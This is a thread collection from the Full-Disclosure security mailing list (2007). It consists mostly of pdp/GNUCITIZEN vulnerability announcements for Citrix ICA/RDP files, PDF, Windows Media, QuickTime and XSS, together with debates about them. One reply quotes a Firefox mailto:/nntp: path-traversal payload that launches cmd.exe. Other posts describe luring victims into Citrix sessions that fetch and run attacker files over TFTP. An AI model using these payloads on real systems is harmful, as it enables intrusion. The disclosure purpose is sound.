http://secunia.com/
Re: [Full-disclosure] [EMAIL PROTECTED]
you win man... I must have been mad to challenge you... check this out.. you are my hero of the day: http://www.gnucitizen.org/about/pdp#comment-58407 On 10/14/07, phioust [EMAIL PROTECTED] wrote: On 10/14/07, pdp (architect) [EMAIL PROTECTED] wrote: military grade exploits? :) dude, I am sorry man.. but you are living in some kind of a dream world. get real, So you pick apart three words of the message and the rest is null? you seem to follow techniques of the great valdis [1] when trying to defend worthless things ( in this case your career). most of the military hacks are as simple as bruteforcing the login prompt.. or trying something as simple as XSS. Stop reading yahoo news the reason XSS is soo neat is because it bypasses all firewalls It doesnt bypass firewalls it has nothing to do with them .. this is like saying you beat pax because you used sql injection to get cmd exec on a machine ( something the selinux team probably has in their presentations ). ... what?, your military grade exploit can do that? your military grade exploit can attack only the things that are visible from outside. Or what about attacking the outside itself? Did you not see the core impact talk or were you too busy giving gadi a reach around by the pool? if you want to sink into the stuff then do web hacking cuz it just works. You mean do web hacking because you do not need any skills to look good and automated tools do it all for you. No thanks ill pass different people do different things and are experienced in different disciplines. To me this sounds like i couldnt write an exploit for a strcpy bug so now I write xss code so i can still put hacker on my business card. btw, this is your 3rd message on FD, right? I guess I should whore the list more and then people will listen to me? Is this the secret to why gadi evron is still allowed to post here? I am just in a mood for philosophical conversations today. you should stay that way since you cant handle much else [1] http://archives.neohapsis.com/archives/fulldisclosure/2007-05/0226.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Remote Desktop Command Fixation Attacks
:-) CQ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Remote Desktop Command Fixation Attacks
not exist, it is because security in depth was not practiced. t -Original Message- From: pdp (architect) [mailto:[EMAIL PROTECTED] Sent: Wednesday, October 10, 2007 4:15 AM To: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: Remote Desktop Command Fixation Attacks http://www.gnucitizen.org/blog/remote-desktop-command-fixation-attacks Security in depth does not exist! No matter what you do, dedicated attackers will always be able to penetrate your network. Seriously! Information security is mostly about risk assessment and crisis management. When it comes to exploitative penetration testing, I relay on tactics rather then exploits. I've already talked about how insecure Remote Desktop service could be. In this post I will show you how easy it is to compromise a well protected Windows Terminal or CITRIX server with a simple social engineering attack and some knowledge about the platform we are about to exploit. The attack is rather simple. All the bad guys have to do is to compose a malicious RDP (for Windows Terminal Services) or ICA (for CITRIX) file and send it to the victim. The victim is persuaded to open the file by double clicking on it. When the connection is established, the user will enter their credentials to login and as such let the hackers in. Vicious! I have a more detailed explanation about the tactics behind this attack. Because I don't want to spam people with tones of text, I just included a link which you can follow. Hope that this is useful and at the same time eye opening, not that it is something completely amazing. But it does work and it works well. cheers. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Remote Desktop Command Fixation Attacks
gboyce, cheers... nice example! although I had something else in mind. maybe I shouldn't have used the term security in depth since your version differs a bit from mine. I guess different semantics. but yes, i agree that systems, processes, data, etc needs to be separated and blended into a balanced mix which as you said, while under attack, it does not give away the keys to the kingdom. thanks On 10/11/07, gboyce [EMAIL PROTECTED] wrote: On Thu, 11 Oct 2007, pdp (architect) wrote: Thor, with no disrespect but you are wrong. Security in depth does not work and I am not planning to support my argument in any way. This is just my personal humble opinion. I've seen only failure of the principles you mentioned. Security in depth works only in a perfect world. The truth is that you cannot implement true security mainly because you will hit on the accessibility side. It is all about achieving the balance between security and accessibility. Moreover, you cannot implement security in depth mainly because you cannot predict the future. Therefore, you don't know what kinds of attack will surface next. Security is not a destination, it is a process. Security in depth sounds like a destination to me. The reason for security in depth is precisely because no security controls are foolproof. The point isn't to make a system completely unbreakable, but to raise the bar for what is required in order to extend their access beyond what they already control. Lets take a webserver as an example. Your webserver only requires ports 80 and 443 listening to the world, so you deploy a firewall in front of it restricting access to just those ports. A default install of the OS may enable a few other processes bound to remote ports like a mail server, portmap, etc. These processes aren't needed on this particular system. The firewall blocks access to them, but firewalls aren't perfect. The attacker may have found a way to get behind it. So you turn off those unneeded services. Being a webserver, its running a number of web applications. Since you don't want to place more trust in those applications than you have to, you chroot apache and have it run as a non-privledged user. Hopefully this will contain a successful compromise. But still, the attacker may break out of the chroot, so you make sure that you remove setuid applications or at least keep them up to date with the latest security updates. You do your best to keep them from becoming root. But even that may fail. Assuming all else has failed, this system is completely owned. But you have other systems with even more sensitive information. So you architect your network such that this webserver does not have more network prilvedges than it needs. You filter outbound network connections to hopefully block a good portion of botnet command and control functions. You block access from this webserver to other systems unless they have a need to talk to them. You implement application level firewalls between it and services that it does need to talk to. THIS is defence is depth. Its not about perfect security. Its about containing breaches. Its about blocking unnecessary risks. Its about making sure that a small mistake that you make does not hand over the keys to the kingdom. -- Greg -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Remote Desktop Command Fixation Attacks
http://www.gnucitizen.org/blog/remote-desktop-command-fixation-attacks Security in depth does not exist! No matter what you do, dedicated attackers will always be able to penetrate your network. Seriously! Information security is mostly about risk assessment and crisis management. When it comes to exploitative penetration testing, I relay on tactics rather then exploits. I've already talked about how insecure Remote Desktop service could be. In this post I will show you how easy it is to compromise a well protected Windows Terminal or CITRIX server with a simple social engineering attack and some knowledge about the platform we are about to exploit. The attack is rather simple. All the bad guys have to do is to compose a malicious RDP (for Windows Terminal Services) or ICA (for CITRIX) file and send it to the victim. The victim is persuaded to open the file by double clicking on it. When the connection is established, the user will enter their credentials to login and as such let the hackers in. Vicious! I have a more detailed explanation about the tactics behind this attack. Because I don't want to spam people with tones of text, I just included a link which you can follow. Hope that this is useful and at the same time eye opening, not that it is something completely amazing. But it does work and it works well. cheers. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 0day: Hacking secured CITRIX from outside
http://www.gnucitizen.org/blog/0day-hacking-secured-citrix-from-outside In the true spirit of GNUCITIZEN half(partial)-disclosure initiative, we announce that it is possible to gain user access level on integrated remote CITRIX servers. The bug/feature does not relay on any client/server vulnerabilities nor client/server misconfiguration issues. All an attacker needs to do to exploit the weakness is to lure a victim, part of an integrated network, to a malicious website or trick them into opening specially crafted ICA files. The attack results into remote command execution with the access level of the current user. The success of the attack relays on the fact that the victim (the proxy) is part of a CITRIX ring to which he/she can perform pass through authentication. Once a connection is instantiated, the victim will unwillingly and transparently login into CITIRIX and perform several commands specified by the attacker. The attacker can simply instruct the remote desktop to download files from a remote TFTP server and execute them locally. Once the attack is performed, the local connection is terminated and the CITRIX session is cleared. No user interaction is required! CAUTION!!! The attack can be used to circumvent/bypass border firewalls and sneak into private networks. This attack is of type CRSF (Cross-site Request forgery), although it does not relay on Web bugs. The attack vector works flawlessly on IE and Firefox (when configured correctly). It also works with any email client or other types of file sharing mechanisms. All versions of CITRIX and CITRIX client are affected. The attack may fail on certain setups. If you manage to re-discover the type of vulnerability outlined in this post, we encourage you to keep it private. Give some time for the folks at CITRIX to react. Currently, I am not aware of any remedy against the attack. Given CITRIX's popularity among corporations and big organizations, it is highly recommended to take this warning with extra caution. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] are the NetBIOS-like hacking days over? - wide open citrix services on critical domains
The other day I was performing some CITRIX testing, so I had a lot of fun with hacking into GUIs, which, as most of you probably know, are trivial to break into. I did play around with .ICA files as well, just to make sure that the client is not affected by some obvious client-side vulnerabilities. This exercise led me to reevaluate great many things about ICA (Independent Computing Architecture). When querying Google and Yahoo for public .ICA files, I was presented with tones of wide open services, some of which were located on .gov and .mil domains. This is madness! No, this is the Web. Through, I wasn't expecting what I have found. Hacking like in the movies? I did not poke any of the services I found, although it is obvious what is insecure and what is not when it comes to citrix. It is enough to look into the ICA files. With a few lines in bash combined with my Google python script, I was able to dump all the ICA files that Google knows about and do some interesting grepping on them. What I discovered was unbelievable. Shall we start with the Global Logistics systems or the US Government Federal Funding Citrix portals - all of them wide open and susceptible to attacks. Again, no poking on my side, just simple observation exercises on the information provided by Google. Just by looking into Google, I was able to find 114 wide open CITRIX instances: 10 .gov, 4 .mil, 20 .edu, 27 .com, etc… The research was conducted offline, therefore there might be some false positives. Among the services discovered, there were several critical applications which looked so interesting that I didn't even dare look at theirs ICA files. I am trying to raise the consumer awareness with this article. I mean, it is 2007 people, it shouldn't be that simple. I did write and article about my findings which you can read from here: http://www.gnucitizen.org/blog/citrix-owning-the-legitimate-backdoor/ I've also created a video that show the lamest way someone can use to break into unprotected citrix just to show the concepts. CITRIX hacking is just like back in the old days with NetBIOS. It simple. It is malicious. It is highly effective. And the problem is that CITRIX is pretty useful. Here is a dilemma for you: Let's say that you have a pretty stable desktop app which you would like to be available on the Web. What you gonna do? Port it to XHTML, JavaScript and CSS? No way! You are most likely going to put it over CITRIX. I've also wrote a script which makes use of ICAClient ActiveX controller to enumerate remote Application, Servers and Farms: http://www.gnucitizen.org/blog/citrix-owning-the-legitimate-backdoor/enum.js Let me know if you find this useful. cheers -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day: PDF pwns Windows
back online - too many users .. On 9/21/07, Rohit Srivastwa [EMAIL PROTECTED] wrote: And your website is down at this moment http://www.gnucitizen.org/ 403 http://www.gnucitizen.org/blog/ 403 http://www.gnucitizen.org/blog/0day-pdf-pwns-windows 404 Is it a reverse attack by someone hurt :) --Through the Firewall,Out the Router,Down the T1,Across the Backbone,Bounced from Satellite Nothing but the Internet - Original Message From: pdp (architect) [EMAIL PROTECTED] To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Thursday, September 20, 2007 6:51:33 PM Subject: [Full-disclosure] 0day: PDF pwns Windows http://www.gnucitizen.org/blog/0day-pdf-pwns-windows I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place. My advise for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issues was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected. A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon. cheers -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Building a website is a piece of cake. Yahoo! Small Business gives you all the tools to get online. http://smallbusiness.yahoo.com/webhosting -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 0day: PDF pwns Windows
http://www.gnucitizen.org/blog/0day-pdf-pwns-windows I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place. My advise for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issues was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected. A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon. cheers -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0day: PDF pwns Windows
My upcoming research feature everything regarding this and the issue you have already discussed. really :).. which one... the one from last year? On 9/20/07, Aditya K Sood [EMAIL PROTECTED] wrote: pdp (architect) wrote: http://www.gnucitizen.org/blog/0day-pdf-pwns-windows I am closing the season with the following HIGH Risk vulnerability: Adobe Acrobat/Reader PDF documents can be used to compromise your Windows box. Completely!!! Invisibly and unwillingly!!! All it takes is to open a PDF document or stumble across a page which embeds one. The issue is quite critical given the fact that PDF documents are in the core of today's modern business. This and the fact that it may take a while for Adobe to fix their closed source product, are the reasons why I am not going to publish any POCs. You have to take my word for it. The POCs will be released when an update is available. Adobe's representatives can contact me from the usual place. My advise for you is not to open any PDF files (locally or remotely). Other PDF viewers might be vulnerable too. The issues was verified on Windows XP SP2 with the latest Adobe Reader 8.1, although previous versions and other setups are also affected. A formal summary and conclusion of the GNUCITIZEN bug hunt to be expected soon. cheers Hi Your point is right. But there are a number of factors other than this in exploiting pdf in other sense. My latest research is working over the exploitation of PDF. Even if you look at the core then there are no restriction on READ in PDF in most of the versions. Only outbound data is filtered to some extent. you can even read /etc/passwd file from inside of PDF. Other infection vector includes infection through Local Area Networks through sharing and printing PDF docs and all. My upcoming research feature everything regarding this and the issue you have already discussed. Regards Aks http://ww.secniche.org -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] security notice: Backdooring Windows Media Files
back online... too many visitors lately On 9/19/07, Rahul Mohandas [EMAIL PROTECTED] wrote: Could someone send me the POC's please if you have a local copy. Gnucitizen.org is not accessible for me. Thanks - Original Message - From: pdp (architect) [EMAIL PROTECTED] To: Memisyazici, Aras [EMAIL PROTECTED] Cc: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Sent: Wednesday, September 19, 2007 12:30 AM Subject: Re: security notice: Backdooring Windows Media Files yes, of course :) but u are running Windows Media Player 11 which is not the default one for Windows XP SP2. Moreover, this Media Player edition is not slipped through any software update either. Therefore, if you are not a Media Player fan, you will never get this version on a fully patched XP SP2 machine. I tend to use iTunes on XP SP2, so yes I am vulnerable. On 9/18/07, Memisyazici, Aras [EMAIL PROTECTED] wrote: Hi pdp! Great admirer of your work :) I just wanted to inform you that I have tested your claim, on a fully patched/updated Win XP SP2 system with an admin account logged in, and was warned sufficiently(asked whether I wanted to play asx files, then asked if I was sure by Media Player, then pop-up was blocked by IE), while the page you tried to produce was blocked via IE's pop-up blocker. You can see/confirm this by viewing these screenshots: http://preview.tinyurl.com/34xpcz (http://i189.photobucket.com/albums/z159/vtknightmare/noworkie1.png ) and http://preview.tinyurl.com/34jx5v (http://i189.photobucket.com/albums/z159/vtknightmare/noworkie2.png ) This was tested on a plain/manila/vanilla version of XP SP2. All I did was update/upgrade to latest available from M$ Update. Sincerely, Aras Memisyazici IT/Security/Dev. Specialist Outreach Information Services Virginia Tech -Original Message- From: pdp (architect) [mailto:[EMAIL PROTECTED] Sent: Tuesday, September 18, 2007 11:58 AM To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Subject: security notice: Backdooring Windows Media Files http://www.gnucitizen.org/blog/backdooring-windows-media-files It is very easy to put some HTML inside files supported by Window Media Player. The interesting thing is that these HTML pages run in less restrictive IE environment. I found that a fully patched windows XP SP2 with IE6 or IE7 and Windows Media Player 9 (default) will open any page of your choice in IE even if your default browser is Firefox, Opera or anything else you have in place. It means that even if you are running Firefox and you think that you are secure, by simply opening a media file, you expose yourself to all IE vulnerabilities there might be. Plus, attackers can perform very very interesting phishing attacks. I prepared a simple POC which spawns a browser window in full screen mode... Think about how easy it is going to be to fake the windows logout - login sequence and phish unaware users' credentials http://www.gnucitizen.org/projects/backdooring-windows-media-files/poc02 .asx On the other hand Media Player 11 (Vista by default) is not exposed to these attacks. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org -- pdp (architect) | petko d. petkov http://www.gnucitizen.org -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] security notice: Backdooring Windows Media Files
http://www.gnucitizen.org/blog/backdooring-windows-media-files It is very easy to put some HTML inside files supported by Window Media Player. The interesting thing is that these HTML pages run in less restrictive IE environment. I found that a fully patched windows XP SP2 with IE6 or IE7 and Windows Media Player 9 (default) will open any page of your choice in IE even if your default browser is Firefox, Opera or anything else you have in place. It means that even if you are running Firefox and you think that you are secure, by simply opening a media file, you expose yourself to all IE vulnerabilities there might be. Plus, attackers can perform very very interesting phishing attacks. I prepared a simple POC which spawns a browser window in full screen mode... Think about how easy it is going to be to fake the windows logout - login sequence and phish unaware users' credentials http://www.gnucitizen.org/projects/backdooring-windows-media-files/poc02.asx On the other hand Media Player 11 (Vista by default) is not exposed to these attacks. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] security notice: Backdooring Windows Media Files
yes, of course :) but u are running Windows Media Player 11 which is not the default one for Windows XP SP2. Moreover, this Media Player edition is not slipped through any software update either. Therefore, if you are not a Media Player fan, you will never get this version on a fully patched XP SP2 machine. I tend to use iTunes on XP SP2, so yes I am vulnerable. On 9/18/07, Memisyazici, Aras [EMAIL PROTECTED] wrote: Hi pdp! Great admirer of your work :) I just wanted to inform you that I have tested your claim, on a fully patched/updated Win XP SP2 system with an admin account logged in, and was warned sufficiently(asked whether I wanted to play asx files, then asked if I was sure by Media Player, then pop-up was blocked by IE), while the page you tried to produce was blocked via IE's pop-up blocker. You can see/confirm this by viewing these screenshots: http://preview.tinyurl.com/34xpcz (http://i189.photobucket.com/albums/z159/vtknightmare/noworkie1.png ) and http://preview.tinyurl.com/34jx5v (http://i189.photobucket.com/albums/z159/vtknightmare/noworkie2.png ) This was tested on a plain/manila/vanilla version of XP SP2. All I did was update/upgrade to latest available from M$ Update. Sincerely, Aras Memisyazici IT/Security/Dev. Specialist Outreach Information Services Virginia Tech -Original Message- From: pdp (architect) [mailto:[EMAIL PROTECTED] Sent: Tuesday, September 18, 2007 11:58 AM To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk Subject: security notice: Backdooring Windows Media Files http://www.gnucitizen.org/blog/backdooring-windows-media-files It is very easy to put some HTML inside files supported by Window Media Player. The interesting thing is that these HTML pages run in less restrictive IE environment. I found that a fully patched windows XP SP2 with IE6 or IE7 and Windows Media Player 9 (default) will open any page of your choice in IE even if your default browser is Firefox, Opera or anything else you have in place. It means that even if you are running Firefox and you think that you are secure, by simply opening a media file, you expose yourself to all IE vulnerabilities there might be. Plus, attackers can perform very very interesting phishing attacks. I prepared a simple POC which spawns a browser window in full screen mode... Think about how easy it is going to be to fake the windows logout - login sequence and phish unaware users' credentials http://www.gnucitizen.org/projects/backdooring-windows-media-files/poc02 .asx On the other hand Media Player 11 (Vista by default) is not exposed to these attacks. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] IE (Internet Explorer) pwns SecondLife
http://www.gnucitizen.org/blog/ie-pwns-secondlife E (Internet Explorer) pwns SecondLife. Before going into details why and how it happens, I would like to bring your attention on SecondLife for a moment. For those of you who don't follow cutting edge technologies, SecondLife is a massive virtual world located on a couple of hundred workstations on-line. The cool thing about SecondLife is that you can do all kinds of things like expressing your artistic side, communicating and of course making business. There are a lot of money into SecondLife. Not that long time ago, there was this girl who made $100 (a million) out of the on-line world. This means that today crooks are after your virtual persona rather then your physical self. Therefore, security in virtual worlds is almost as important as security in the physical world. Now let's get back to the real issue. Attackers can steal the victim's login credentials, therefore hijacking their virtual persona, by simply tricking them into visiting a malicious Web page. It is automatic and the user doesn't have to do anything (no user interaction is required). I would rate this issue as Medium risk although if the victim have a lot of Linden dollars ($L) then the situation becomes quite critical. At the time of writing 1$ can be exchanged for 268.15$L. So, let's stop thinking only one dimension for a moment. Compromising the integrity of the browser or the operating system is cool but is it really worthed? Attackers are after your money not your pictures or school essays. Think about this for a second. cheers -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] 0DAY: QuickTime pwns Firefox
http://www.gnucitizen.org/blog/0day-quicktime-pwns-firefox It seams that QuickTime media formats can hack into Firefox. The result of this vulnerability can lead to full compromise of the browser and maybe even the underlaying operating system. Don't try this at home. In practice I can do anything with the browser, like installing browser backdoors, and the operating system if the victim is running with administrative privileges. However, just for the sake of this demonstration, I simply open calc.exe. Keep in mind that the exploit is cross-platformed. Check the link above for demonstration and more information how the exploit works. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] How to make money with XSS
http://www.gnucitizen.org/blog/how-to-make-money-with-xss Finding XSS is dead easy task. Everybody is vulnerable to this type of issue and even if there are protection mechanisms on place such as application firewalls and sanitization filters, very often attackers can get a stable exploit working in a matter of a couple of minutes. In fact, I don't think that there are unstable XSS exploits. It is not like the attacker have to manipulate the stack or a corrupted heap in order to get some sort of execution control. No! It is a simple injection issue. So the question is not whether the bad guys can find a XSS issue on your site/application - they can and they will. The question is what sort of things they can do with it. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WHITE PAPER: For my n ext trick… hacking Web2.0
After several month spent in research on Web2.0 Insecurities I've decided to sit down and write a whitepaper. The paper quickly became rather blurred due to enormous amount of notes I've collected on this subject. This is the reason why it was later restructured into stories, which provide a lot better medium for understanding the content. http://www.gnucitizen.org/projects/for-my-next-trick-hacking-web20/ http://www.gnucitizen.org/projects/for-my-next-trick-hacking-web20/web2.0hacking.pdf http://docs.google.com/Doc?id=dfpvfkxn_48f87xsv For some Web2.0 symbolizes the start of a new era of the Web, for others it is merely a marketing buzzword designed to hook unaware venture capitalists on the Web2.0 hype. The term Web2.0 appeared for the first time in 2003 at a conference organized by O'Reilly media. The event, simply titled Web 2.0″, attempted to reference the second generation of web technologies such as social communities, server oriented architectures, Wikis, blogs, collaborative environments, AJAX, etc. Since then the term has become widely adopted across the entire Web industry and it has been used ever since to describe innovation. In simple words, Web2.0 outlines the technological, philosophical and social superset of what we used to know as just the Web. Although we know that the Web is not bound to any version number, it makes our lives a lot easier to do so, so we can refer to a particular set of features. The features of the Web2.0 era are rather blurred due to the enormous amount of different opinions on the matter but we all agree that they must include things such as feeds, data aggregators, collaborative environments, social networks, client-side technologies and SOA (Server Oriented Architecture). Although Web2.0 has improved our ability to freely communicate and share via the means of the Net, it has brought some unimaginable dangers and as a result it is insecure. Web2.0 security is very much a collection of every single security aspects of its components. On their own they are just simple system abnormalities, but when put together they create a problem worth our attention. In this paper we are going to outline some of the dangers of Web2.0 by combining fictional stories with technology that is real. Each story begins with a prologue, which introduces the problem, and finishes with a conclusion, which summarizes the attack techniques that are described within the story context. Cheers -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Facebook Homepage Source Code Probably Leaked
http://www.gnucitizen.org/blog/facebook-homepage-source-code-probably-leaked/ It seams that Facebook's Homepage Source code was leaked. This is yet to be confirmed by Facebook themselves so do not take it for real. I've spend a couple of moments reading the single PHP file and there is nothing wrong with it that is obvious to me at this stage, apart from the fact it gives us a pretty good idea how the software is structured and where to find interesting libraries and other components of the Facebook application. If you find anything interesting please send it to us privately or I would suggest to contact the Facebook straightaway. cheers -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Sunday Morning Spam: Intel Video Ad on Security, directed by Christopher Guest
http://www.gnucitizen.org/blog/intel-video-ad-on-security-directed-by-christopher-guest the video is quite interesting I must say. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIREFOX 2.0.0.5 new vulnerability
works like a charm :) ? On 7/25/07, Mesut EREN [EMAIL PROTECTED] wrote: Hi all, FF 2.0.0.5 new remote code Execution vulnerability, I tested FF 2.0.0.5. But don't work is code. Example code is mailto:%00%00../../../../../../windows/system32/cmd.exe ../../../../../../../../windows/system32/calc.exe - blah.bat nntp:%00%00../../../../../../windows/system32/cmd.exe ../../../../../../../../windows/system32/calc.exe - blah.bat Where i missing? Mesut EREN BAŞAK ÇATI CEPHE SİSTEMLERİ Bilgi İşlem Sorumlusu MCSA:S,MCSE:S,CEH,CCNA [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Owasp-leaders] new version of XSSDB
Hi Dinis, we are working on a offline support with Google Gears - once you visit the application, it will be cached and the database will be synchronized on your PC. Then you can use it whenever you don't have Internet connectivity. We are also planning to release a standalone version for Adobe AIR. Thanks for the interest On 7/23/07, Dinis Cruz [EMAIL PROTECTED] wrote: This is very good stuff And it really shows the power of XSS. Anybody with some cycles to add offline support for this (maybe retrieving the RSS from the local disk)? Dinis Cruz Chief OWASP Evangelist http://www.owasp.org On 7/21/07, pdp (architect) [EMAIL PROTECTED] wrote: Hi there, GC has released a new version of XSSDB (http://www.gnucitizen.org/xssdb). The current version contains an XSS testing tool which is there to try each payload against the applications your are testing. You can submit XSS payloads. We are still in beta/alpha stage but gradually moving forward. Your feedback will be greatly appreciated. We are also working on a toolkit for Technika to automate some other tasks. thanks for the interest P.S. according to .mario, our leading database maintainer and founder of the PHPIDS group, there will be more then 50 new payload additions for the following couple of weeks. -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ OWASP-Leaders mailing list [EMAIL PROTECTED] https://lists.owasp.org/mailman/listinfo/owasp-leaders -- -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] digital stalking, Google SearchHistory RSS Interface
just to add, Google WebSearch is just one of the many services that offer feed export. Pretty much everything else has that option too and can be accessed through basic auth. I know that this is an obstacle. However, keep in mind that the purpose of this post is not to show how to own people but elaborate on what can be done after that. I mean, if the attacker has access to your account, they may as well turn the WebHistory ON if it s OFF. All attackers want from you is to get your secrets. Consider it like the situation where you have a physical/remote access to a machine and now you want to install a rootkit or keylogger. On 7/22/07, Greenarrow 1 [EMAIL PROTECTED] wrote: Well, for one, for security purposes why would anyone log into Google for search purposes. Second, most people I know who use any type of security usually use a proxy if they are doing unknown type searches or surfing the web. This would place a kink in the ease of getting the info you stated in your email. While yes if anyone wanted to get your info that bad it would not matter what method one uses but I see the way you show as being the way a common Window home user would seek search data and I sure hope that corporate does not go this route. Regards, George Greenarrow1 InNetInvestigations-Forensic - Original Message - From: pdp (architect) [EMAIL PROTECTED] To: full-disclosure@lists.grok.org.uk; OWASP Leaders [EMAIL PROTECTED]; WASC Forum [EMAIL PROTECTED] Sent: Saturday, July 21, 2007 2:04 AM Subject: [WEB SECURITY] digital stalking, Google SearchHistory RSS Interface http://www.gnucitizen.org/blog/snoop-onto-them-as-they-snoop-onto-us This is not that of a news since the service is available since January this year, however I cannot see that many people discussing it. Anyway, Google allows consummation of SearchHistory profiles as simple RSS/ATOM feeds. IMHO, this will impact the security and privacy of the users (us) quite significantly. [...] The search history feed can be access from the following url: http://www.google.com/history/?output=rss. The interesting thing is that if your are not authenticated, the Google service will ask you to do so but though HTTP Basic 